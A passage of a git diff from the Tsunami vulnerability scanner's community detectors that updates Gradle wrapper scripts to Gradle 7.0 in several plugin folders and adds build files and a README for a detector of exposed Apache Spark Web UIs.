MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat b/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat +++ b/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew b/community/detectors/apache_spark_cve_2022_33891/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_spark_cve_2022_33891/gradlew +++ b/community/detectors/apache_spark_cve_2022_33891/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew.bat b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_spark_cve_2022_33891/gradlew.bat +++ b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_spark_exposed_webui/README.md b/community/detectors/apache_spark_exposed_webui/README.md new file mode 100644 index 000000000..cc7b08b04 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/README.md @@ -0,0 +1,23 @@ +# Apache Sparks exposed Web UI + +This detector checks for an exposed Apache Spark Web UI. + +An Apache Spark Web Ui which is exposed to an attacker might disclose sensitive +information to them. An attacker can retrieve information such as the configured +workers and master node within the Apache Sparks environment. Furthermore, an +attacker gains access to the output logs of run tasks. This might disclose +sensitive information if a task is logging sensitive information during its +execution. + +The Web UI is exposed on the root path of the Apache Sparks instance. An +exemplary URI might look like the following: `http://:8080/` + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_spark_exposed_webui/build.gradle b/community/detectors/apache_spark_exposed_webui/build.gradle new file mode 100644 index 000000000..541624345 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/build.gradle @@ -0,0 +1,70 @@ +plugins { + id 'java' +} + +description = 'Tsunami VulnDetector plugin to detect an exposed Apache Spark Web UI.' +group 'com.google.tsunami' +version '1.0-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + okhttpVersion = '3.12.0' + autoValueVersion = '1.7' + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.auto.value:auto-value-annotations:${autoValueVersion}" + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + annotationProcessor "com.google.auto.value:auto-value:${autoValueVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} diff --git a/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..e6441136f Binary files /dev/null and b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/apache_spark_exposed_webui/gradlew b/community/detectors/apache_spark_exposed_webui/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/apache_spark_exposed_webui/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused 